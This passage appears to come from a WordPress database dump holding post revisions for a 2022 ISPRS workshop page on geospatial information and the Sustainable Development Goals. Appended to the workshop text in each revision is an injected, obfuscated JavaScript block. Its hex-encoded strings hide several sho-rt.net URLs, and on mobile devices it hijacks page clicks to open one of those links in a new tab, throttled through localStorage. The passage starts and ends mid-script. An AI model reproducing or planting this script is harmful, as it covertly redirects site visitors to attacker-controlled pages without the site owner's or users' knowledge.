_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:38:06','2022-10-13 23:38:06','',2768,'https://gsw2023.com/?p=2775',0,'revision','',0),
(2776,1,'2022-10-13 23:41:16','2022-10-13 23:41:16','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\">\n<strong>Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</strong></h5>\n<h5 style=\"text-align:justify; color:black;\">\n<strong>This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:41:16','2022-10-13 23:41:16','',2768,'https://gsw2023.com/?p=2776',0,'revision','',0),
(2777,1,'2022-10-13 23:42:02','2022-10-13 23:42:02','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 